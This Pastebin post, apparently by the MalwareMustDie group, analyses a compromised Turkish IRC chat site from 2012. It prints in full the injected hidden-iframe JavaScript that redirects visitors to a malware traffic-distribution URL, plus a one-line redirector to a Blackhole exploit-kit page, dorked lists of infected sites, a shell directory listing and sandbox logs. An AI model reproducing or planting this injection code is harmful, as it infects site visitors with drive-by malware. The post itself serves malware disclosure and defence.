Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- =================================
- #MalwareMustDie!!
- 31.210.155.181 / http://irc.muhabbetturk.net/
- loaded with infectors
- Case 1 = 4 files (TDS Malware Infector)
- http://fohfynly.ru/count2.php
- Case 2 = 1 file (BHEK 2 js.js redirector to PluginDetect)
- http://q.e-tecinnovation.co.uk/links/created_danger.php
- #Hint from Hulk_crusader for case 2
- Digged up case 1 by @unixfreaxjp
- Sat Nov 10 01:13:44 JST 2012
- !! IMPORTANT!!
- Curently major infection of the case 1 ITW!!!
- PoC:
- // infection spreads detectionc checking....
- DORK THIS ===> " 'src = 'http://fohfynly.ru/count2.php"
- About 11,700 results (0.30 seconds) ↓↓
- Online Test of Usul-e-Fiqh-1
- www.qoitrat.org/test/Usul-e-Fiqh-1/default.asp - Cached
- (function() { var a = document.createElement('iframe'); a.src = 'http://fohfynly.ru/count2.php'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '2px'; ...
- Online Test of Shrh-e-Luma-2
- www.qoitrat.org/test/Shrh-e-Luma-2/default.asp - Cached
- (function() { var a = document.createElement('iframe'); a.src = 'http://fohfynly.ru/count2.php'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '2px'; ...
- SR Presentation Folders - Top Class Signs and Printing
- www.topclassprinting.com/...php/.../SR-Presentation-Folders.html?...
- This site may harm your computer.
- createElement('iframe'); a.src = 'http://fohfynly.ru/count2.php'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '2px'; a.style.width = '2px'; ...
- Signs and Printing | Forgot your Username?
- www.topclassprinting.com/index.php/Lost-user-name.html
- This site may harm your computer.
- (function(){ var a = document.createElement('iframe'); a.src = 'http://fohfynly.ru/count2.php'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '2px'; ...
- H2Solution
- www.h2-solution.com/index.asp?action=team - Cached
- (function() { var a = document.createElement('iframe'); a.src = 'http://fohfynly.ru/count2.php'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '2px'; ...
- Feedback - Gitarattan International Business School
- gitarattan.edu.in/feedback.php - Cached
- Feedback Form <script type="text/javascript" language="javascript" > (function(){ var a = document.createElement('iframe'); a.src = 'http://fohfynly.ru/count2.php'; ...
- Ferrari San Antonio, New and Pre-owned Ferrari and Maserati ...
- https://heroesandfantasies.com/ - Cached
- (function() { var a = document.createElement('iframe'); a.src = 'http://fohfynly.ru/count2.php'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '2px'; ..
- 1 2 3 4 5 6 7 8 9 10 Next
- ==================================
- <<<<<<<<<<<< P o C >>>>>>>>>>>>
- //hint
- See http://irc.muhabbetturk.net/
- ------------------------
- //making it short, got the shell.....
- $ ls -alF
- total 532
- drwxr-xr-x 8 xxxxx xxxxx 1024 Nov 10 00:17 ./
- drwxrwxrwx 6 xxxxx xxxxx 512 Nov 10 00:17 ../
- drwxr-xr-x 3 xxxxx xxxxx 512 Nov 10 00:17 _autoindex/
- -rwxr--r-- 1 xxxxx xxxxx 0 Nov 10 00:11 cnt.php*
- -rwxr--r-- 1 xxxxx xxxxx 0 Nov 10 00:11 count.php*
- -rwxr--r-- 1 xxxxx xxxxx 2550 Nov 3 01:08 dagitim.html*
- -rwxr--r-- 1 xxxxx xxxxx 105043 Aug 18 2011 flaxchat.cab*
- -rwxr--r-- 1 xxxxx xxxxx 169843 May 25 03:30 flaxchat.jar*
- drwxr-xr-x 2 xxxxx xxxxx 512 Nov 10 00:17 images/
- drwxr-xr-x 2 xxxxx xxxxx 512 Nov 10 00:17 nrJDKNYN/
- -rwxr--r-- 1 xxxxx xxxxx 2011 Nov 10 00:10 oyun.html*
- drwxr-xr-x 2 xxxxx xxxxx 512 Nov 10 00:17 photos/
- -rwxr--r-- 1 xxxxx xxxxx 3268 Nov 3 01:08 postinfo.html*
- -rwxr--r-- 1 xxxxx xxxxx 633 Aug 18 2011 setting.txt*
- drwxr-xr-x 7 xxxxx xxxxx 512 Nov 10 00:17 skins/
- -rwxr--r-- 1 xxxxx xxxxx 2524 Nov 3 01:08 sohbet.html*
- drwxr-xr-x 2 xxxxx xxxxx 512 Nov 10 00:17 sounds/
- -rwxr--r-- 1 xxxxx xxxxx 997 Nov 3 01:08 titresim.js*
- -rwxr--r-- 1 xxxxx xxxxx 170138 Aug 18 2011 xxflaxchat.jar*
- ---------------------------------------
- //scp flush'em out for plastic surgery...
- :
- --00:13:41-- http://irc.muhabbetturk.net/skins/mirc/?NA
- => `irc.muhabbetturk.net/skins/mirc/index.html@NA'
- Connecting to irc.muhabbetturk.net|31.210.155.181|:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 2,573 (2.5K) [text/html]
- --00:13:42-- http://irc.muhabbetturk.net/skins/mirc/?MD
- => `irc.muhabbetturk.net/skins/mirc/index.html@MD'
- Connecting to irc.muhabbetturk.net|31.210.155.181|:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 2,573 (2.5K) [text/html]
- --00:13:43-- http://irc.muhabbetturk.net/skins/mirc/?SD
- => `irc.muhabbetturk.net/skins/mirc/index.html@SD'
- Connecting to irc.muhabbetturk.net|31.210.155.181|:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 2,573 (2.5K) [text/html]
- :
- ===========================
- // infector files...
- 1) Infectors to the TDS Malware CNC
- domains http://fohfynly.ru/count2.php
- URL: http://fohfynly.ru/count2.php
- ===========================
- =================================================
- $ cat /dagitim.html (TDS Malware Infection scheme...)
- =================================================
- <script language="JavaScript1.2">
- function shake(n) {
- if (parent.moveBy) {
- for (i = 10; i > 0; i--) {
- for (j = n; j > 0; j--) {
- parent.moveBy(0,i);
- parent.moveBy(i,0);
- parent.moveBy(0,-i);
- parent.moveBy(-i,0);
- }
- }
- }
- }
- </script>
- <applet name="Flaxchat" code="flaxchat.FlaxChat.class"
- archive ="flaxchat.jar,flaxchess.jar,flaxdraw.jar,flaxflota.jar,flaxttt
- .jar,flaxgammon.jar"
- width ="100%"
- height ="400"
- codebase = "http://irc.muhabbetturk.net">
- <param name="CABBASE" value="flaxchat.cab">
- <param name="ident" value="flaxchat">
- <param name="fullname" value="Flaxchat">
- <param name="nickname" value="">
- <param name="Channel1" value="#sohbet,#oyun">
- <p>Java uygulamas² kurulu de≡il.Java yuklemek icin <a href="http://www.flaxchat.
- com/?getjava">chat applet</a></p><!--d1752c--><script type="text/javascript" lan
- guage="javascript" >
- :
- blah...
- ---------------------------------------------
- //simulate....
- [2012-11-10 00:14:14] [HTTP] URL: http://irc.muhabbetturk.net/dagitim.html (Status: 200, Referrer: None
- )[2012-11-10 00:14:14] [HTTP] URL: http://irc.muhabbetturk.net/dagitim.html (Content-type: text/html, MD
- 5: 12154dbf36908011e17fcbd7a93b007b)
- [2012-11-10 00:14:17] <applet archive="flaxchat.jar,flaxchess.jar,flaxdraw.jar,flaxflota.jar,flaxttt.jar,flaxgammon.jar" code="flaxchat.FlaxChat.class" codebase="http://irc.muhabbetturk.net" height="400" name="Flaxchat" width="100%">
- <param name="CABBASE" value="flaxchat.cab"></param>
- <param name="ident" value="flaxchat"></param>
- <param name="fullname" value="Flaxchat"></param>
- <param name="nickname" value=""></param>
- <param name="Channel1" value="#sohbet,#oyun"></param>
- <p>Java uygulamasý kurulu deđil.Java yuklemek icin <a href="http://www.flaxchat.com/?getjava">chat applet</a></p><!--d1752c--><script language="javascript" type="text/javascript"> (function(){ var a = document.createElement('iframe'); a.src = 'http://fohfynly.ru/count2.php'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '2px'; a.style.width = '2px'; a.style.left = '1px'; a.style.top = '1px'; if(!document.getElementById('mira')) { document.write('<div id=\'mira\'></div>'); document.getElementById('mira').appendChild(a); }})();</script><!--/d1752c-->
- </applet>
- [2012-11-10 00:14:17] [Navigator URL Translation] flaxchat.jar,flaxchess.jar,flaxdraw.jar,flaxflota.jar,flaxttt.jar,flaxgammon.jar --> http://irc.muhabbetturk.net/flaxchat.jar,flaxchess.jar,flaxdraw.jar,flaxflota.jar,flaxttt.jar,flaxgammon.jar
- [2012-11-10 00:14:18] [HTTP] URL: http://irc.muhabbetturk.net/flaxchat.jar,flaxchess.jar,flaxdraw.jar,flaxflota.jar,flaxttt.jar,flaxgammon.jar (Status: 404, Referrer: http://irc.muhabbetturk.net/dagitim.html)
- [2012-11-10 00:14:18] FileNotFoundError: http://irc.muhabbetturk.net/flaxchat.jar,flaxchess.jar,flaxdraw.jar,flaxflota.jar,flaxttt.jar,flaxgammon.jar
- [2012-11-10 00:14:18] Unhandled script language: javascript1.2
- [2012-11-10 00:14:18] <param name="CABBASE" value="flaxchat.cab"></param>
- [2012-11-10 00:14:18] <param name="ident" value="flaxchat"></param>
- [2012-11-10 00:14:18] <param name="fullname" value="Flaxchat"></param>
- [2012-11-10 00:14:18] <param name="nickname" value=""></param>
- [2012-11-10 00:14:18] <param name="Channel1" value="#sohbet,#oyun"></param>
- [2012-11-10 00:14:33] <iframe src="http://fohfynly.ru/count2.php"></iframe> <=============BINGO!!!!!!!!!!!!!!!
- [2012-11-10 00:14:33] [iframe redirection] http://irc.muhabbetturk.net/dagitim.html -> http://fohfynly.ru/count2.php <=============BINGO!!!!!!!!!!!!!!!
- ---------------------------------------------
- // Infection #1 found : http://fohfynly.ru/count2.php
- // checking....
- --00:25:05-- http://fohfynly.ru/count2.php
- => `./sample'
- Resolving fohfynly.ru... failed: Unknown host.
- //reference #1....
- http://urlquery.net/report.php?id=91654
- URL http://fohfynly.ru/count2.php
- IP 78.96.77.179
- ASN AS6830 UPC Broadband Holding B.V.
- Location [Romania] Romania
- Report completed 2012-11-05 16:41:59 CET
- Status Report complete.
- urlQuery Alerts Detected a TDS URL pattern
- //http requests....
- GET /count2.php HTTP/1.1 HTTP/1.1 302
- Host: fohfynly.ru HTTP/1.1 302
- GET /billing.php HTTP/1.1 HTTP/1.1 200 OK
- Host: na-igre.pp.ua Content-Type: text/html
- GET /ga.js HTTP/1.1 HTTP/1.1 200 OK
- Host: www.google-ana Content-Type: text/javascript
- lytics.com
- GET /__utm.gif?utmwv=5.3.7&utms=1&utmn=885136485&utmhn=na-igre.pp.ua&utmcs=ISO-8859-1&utmsr= HTTP/1.1 200 OK
- 1176x885&utmvp=1176x761&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmhid=2033196436&utmr= Content-Type: image/gif
- -&utmp=%2Fbilling.php&utmac=UA-7382389-46&utmcc=__utma%3D119089686.1353519843.1352130089.1352130089.1352130089.1
- %3B%2B__utmz%3D119089686.1352130089.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&utmu=q~ HTTP/1.1
- Host: www.google-analytics.com
- GET /favicon.ico HTTP/1.1 HTTP/1.1 302 Found
- Host: na-igre.pp.ua Content-Type: text/html; charset=iso-8859-1
- GET /error404/ HTTP/1.1 HTTP/1.1 200 OK
- Host: www.host1free.com Content-Type: text/html; charset=UTF-8 // currently unregistered domain....
- //elinks snaps...
- # Error 404 - Page Not Found (p1 of 4) // currently unregistered domain....
- # Host1Free Banners Free Hosting
- host1free.com
- Sign-Up For Free Web Hosting! Login to Control Panel
- Free Web Hosting is Powered by HOST1PLUS
- * Free Hosting
- * Features
- * Affiliates
- * Forum / Support
- * Blog
- * Upgrades
- * Free VPS
- VPS Hosting
- Web Hosting
- //reference #2
- URL http://fohfynly.ru/count2.php
- IP 189.214.146.232
- ASN AS28554 Cablemas Telecomunicaciones SA de CV
- Location [Mexico] Mexico
- Report completed 2012-11-02 20:33:26 CET
- Status Report complete.
- urlQuery Alerts Detected a TDS URL pattern
- // whois check...fohfynly.ru....
- domain: FOHFYNLY.RU
- nserver: ns1.systeat.com.
- nserver: ns2.systeat.com.
- nserver: ns3.systeat.com.
- nserver: ns4.systeat.com.
- nserver: ns5.systeat.com.
- nserver: ns6.systeat.com.
- state: REGISTERED, NOT DELEGATED, UNVERIFIED
- person: Private Person
- registrar: REGGI-REG-RIPN
- admin-contact: http://www.webdrive.ru/webmail/
- created: 2012.11.01
- paid-till: 2013.11.01
- free-date: 2013.12.02
- source: TCI
- Last updated on 2012.11.09 19:41:38 MSK <============== JUST CHANGED
- =================================================
- $ cat /postinfo.html ; cat /sohbet.html ; cat /titresim.js
- (TDS Malware Infectors...)
- =================================================
- :
- <!--d1752c--><script type="text/javascript" language="javascript" > (function(){ var a = document.createElement('iframe');
- a.src = 'http://fohfynly.ru/count2.php'; <=================================#w000t!!! Bingo!!
- a.style.position = 'absolute';
- a.style.border = '0'; a.style.height = '2px'; a.style.width = '2px'; a.style.left = '1px';
- a.style.top = '1px'; if(!document.getElementById('mira')) { document.write('<div id=\'mira\'></div>');
- document.getElementById('mira').appendChild(a); }})();</script><!--/d1752c-->
- :
- /*d1752c*/
- (function(){ var a = document.createElement('iframe'); a.src = 'http://fohfynly.ru/count2.php'; a.style.position = 'absolute'; a.style.border = '0';
- a.style.height = '2px'; a.style.width = '2px'; a.style.left = '1px'; a.style.top = '1px';
- if(!document.getElementById('mira')) { document.write('<div id=\'mira\'></div>'); document.getElementById('mira').appendChild(a); }})();
- /*/d1752c*/
- =================================================
- // infector files...
- 2) BHEK2 js.js Infecor...
- See nrJDKNYN folder of: http://irc.muhabbetturk.net/
- $ cat /nrJDKNYN/js.js
- =================================================
- document.location='http://q.e-tecinnovation.co.uk/links/created_danger.php';
- //accessing... with or without you....NO! tor...
- --01:09:02-- http://q.e-tecinnovation.co.uk/links/created_danger.php
- => `./sample'
- Resolving q.e-tecinnovation.co.uk... failed: Unknown host.
- //reference... as per expected BHEK2.......
- URL http://q.e-tecinnovation.co.uk/links/created_danger.php
- IP 74.91.118.239
- ASN AS12182 Internap Network Services Corporation
- Location [United States] United States
- Report completed 2012-11-06 16:28:30 CET
- Status Report complete.
- urlQuery Alerts Detected BlackHole v2.0 exploit kit URL pattern
- ====================
- #MalwareMustDie!
- Sat Nov 10 01:13:44 JST 2012
- *) This is a team work effort!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement